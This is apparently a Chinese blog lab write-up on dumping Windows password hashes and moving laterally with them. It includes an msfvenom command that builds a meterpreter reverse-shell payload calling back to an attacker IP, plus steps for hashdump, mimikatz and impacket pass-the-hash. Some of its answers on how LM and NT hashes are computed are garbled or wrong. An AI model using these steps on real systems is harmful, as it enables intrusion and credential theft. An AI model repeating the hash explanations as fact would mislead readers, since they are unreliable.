抓取内网windows密码和利用hash横向及相关问题

已于 2024-04-27 09:53:56 修改
阅读量383 收藏 4
点赞数 3
分类专栏: 网安 文章标签: 安全 网络
于 2024-04-20 22:38:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vt_yjx/article/details/138010638
版权

目录

实验准备

用msf拿到shell

抓取hash和明文密码

相关问题

问题1.通过hashdump抓取所有用户的密文为什么分成两个模块,这两个模块分别代表什么 ?

问题2.为什么第一个模块 永远是一样的aad3?

问题3.这两个模块的加密算法有什么不同,如何加密的?

问题4.windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文?

实验准备

        一台kali

        一台windows10,防火墙和实时保护关掉。

用msf拿到shell

1.先生成一个反弹木马:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.247.135 LPORT=12345 -f exe -o shell.exe

2.然后挂到网页上去win10上用浏览器下载下来:

3.msf开启监听,然后点击木马上线:

抓取hash和明文密码

1.提权后直接hashdump获取hash值:

相关问题

问题1.通过hashdump抓取所有用户的密文为什么分成两个模块,这两个模块分别代表什么 ?

        因为这两部分是不同的内容,第一部分是LM哈希,第二部分是NT哈希。

问题2.为什么第一个模块 永远是一样的aad3?

        因为LM哈希不安全,都是aad3这样的内容说明LM Hash为空值或被禁用了。

问题3.这两个模块的加密算法有什么不同,如何加密的?

        第一部分是基于DES算法加密的,第二部分是基于MD4算法加密的;

        第一部分加密基于md4,过程是用户密码首先被转换为Unicode格式,然后使用Unicode Little-Endian编码进行哈希,第二部分是将用户密码和一些随机数来结合计算出的哈希值,更复杂更安全。

2.然后现在尝试抓取明文密码:

        用工具mimikatz,先在会话中导入kiwi:

        然后尝试抓取明文密码:

发现密码这一列都是null,先看下面这个问题:

问题4.windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文?

       登录的时候会启动一个winlogon.exe进程,把明文账号密码发给lsass.exe这个进程,然后这个进程会干两件事,1是把明文账号密码在内存中存储一份,2是把账号密码加密后存在SAM这个文件里:

但是这个文件打不开看不了。可以利用其他工具来看。

现在回到第二部,因为mimikatz这个工具是利用了lsass.exe会把一份明文账号密码存到内存中,所以才能抓到,但是由于系统补丁才抓不到了。不过继续横向不需要明文密码,因为系统验证都是通过比对hash值的,而哈希值又是不可逆的,所以知道明文密码也没什么作用,反而比hash麻烦了一步。

3.利用hash登录

        这里直接利用kali自带的脚本,/usr/share/doc/python3-impacket/examples下的psexec.py:

vt_yjx
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
使用hash直接登陆windows
收集盒 Book box
08-24 695
现在的网络管理员安全防范意识可谓越来越强.一个复杂的密码是必然的.那么在渗透中,如果我们拿到了管理员的HASH,缺怎奈硬盘小、带宽低、配置烂,无法成功破解出来,怎么办呢? 直接发过程了...网上关于HASH传递攻击的文章较多,就不说了。这里演示的一个情况特别适用于内网渗透,当我们获得一台服务器的管理权限后,继续渗透内网其他服务器. 必不可少的都会先获取到本服务器的管理员密码再用来尝试目标服
cs给msf传shell+mimikatz读取明文密码
vt_yjx的博客
05-22 609
set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)密码是null,是因为官方改的。然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中。windows输入密码的进程是winlogon.exe。考虑sam文件了,可以dump出来本地破解出明文。上传一个锁屏脚本,管理员重新输入密码后可以抓明文。mimikatz就抓内存中的明文。set lport 自己的端口号。set lhost 本机ip。
cs与msf权限传递,以及mimikatz抓取明文密码
最新发布
M372109150的博客
06-15 1133
cs与msf权限传递,以及mimikatz抓取win10明文密码
msf渗透实验,抓取密钥及密钥生成原理所引发的问题
qq_64951792的博客
04-26 928
msf渗透实验
Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集1 ——基于TCP协议收集主机信息(主机信息、端口状态、密码嗅探)
天下著书立传者,皆为我师
05-03 938
实验内网渗透环境Metasploitable2-linux:靶机 192.168.234.8kali-debian:攻击机 192.168.234.141win7 虚拟机:靶机 192.168.234.158在此声明文章仅供相互学习参考,严禁利用于违法犯忌的事,任何事故自行承担!!
hash密码抓取工具大全
03-25
hash密码抓取提取密码工具大全
PowerShell小技巧之获取Windows系统密码Hash
01-09
当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大...
内网横向移动密码凭证获取总结.pdf
12-08
总的来说,内网横向移动中的密码凭证获取涉及多种技术和工具,包括利用注册表备份、内存分析以及哈希传递。了解这些方法对于网络安全防御者来说至关重要,因为它们能帮助识别潜在的攻击途径,并采取相应的保护措施,...
wce Windows hash抓取工具 附教程
09-19
标题中的“wce Windows hash抓取...通过理解和使用wce,不仅可以了解系统的安全性,还可以学习到Windows权限管理机制和密码哈希的相关知识。同时,这也提醒我们重视系统安全,定期进行安全检查,防止潜在的攻击风险。
关于64位windows系统HASH抓取.pdf
12-22
抓取 64 位 Windows 系统的 Hash 需要了解 Windows 系统的安全策略工作机制,並遵守相关安全策略和规定。只有这样,我们才能成功地抓取 HashHash 抓取技术在实际应用中有很多用途,例如,在渗透测试中, Hash...
MSF后渗透之获取windows登录密码
qq_55364369的博客
09-05 2688
MSF后渗透之获取windows登录密码
msf 使用 hashdump 和 wce 提取 hash
热门推荐
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
Metasploit(后渗透攻击:hash攻击)
qq_41453632的博客
12-18 972
实验前提: 已经提权到了system权限,否则hashdump命令会失败。 第一步: 第二步: 因为我这里是administrator,所以需要getsystem下 第三步: 第四步: 第五步:  ...
1、使用Hash直接登录Windows
Fly_鹏程万里
05-17 3027
环境攻击机   :  kali linux 2018                        192.168.11.144目标主机:Windows server 2003 R2          192.168.11.133主要用途这个可以用于后渗透测试阶段,当我们获取到一个系统的一个WEBshell之后,我们可以上传gethashes.exe到该目标系统,之后在目标系统中获取当前登录用户的...
Metasploit使用hash直接登录系统
ytfhjhv的博客
01-24 356
Metasploit使用hash直接登录系统
Metasploit使用Hash直接登录Windows
jackey3Lin的专栏
10-21 2443
首先,在本地主机(假设为目标主机) 新建一个isosky用户,并为之设置密码,然后通过gethashes.exe获取到HASH C:\>net user isosky test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B51404
Metasploit之Hash值传递渗透
a1b2c3是弱口令
12-06 3094
讲述Metasploit知道内网机器密码或者是不知道密码能够拿到shell获取到hash值的两种渗透测试。 测试环境 目标机: Windows 7 Ultimate 192.168.1.9 攻击机: Linux 4.6.0-kali1-amd64 192.168.1.31 I HAVE PASS 攻击机姿势: msfconsole use exploit/windows/smb/psex...
Metasploit -- 利用Hash远程登录
weixin_41489908的博客
03-09 429
我能想通,也能接受,但是,我很难过。。。 ​---- 网易云热评 一、利用QuarksPwDump获取hash值 quarkspwdump --dump-hash-local --output 1.txt 二、利用msf远程登录 1、选择攻击模块 use exploit/windows/smb/psexec 2、设置相关参数 set rhosts 192.168.139.129set smbuser administratorset smbpass AAD3B43...
利用SSPI和NTLM身份验证抓取NetNTLMv1 Hash
Hash 抓取网络安全攻击中的一种常见技术,通过抓取目标机器的 Hash 值,可以实现身份验证和权限提升。本文将介绍通过 SSPI 调用 NTLM 身份验证,通过协商使预定义Challenge 降级为 NetNTLMv1,获取到 NetNTLMv1 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值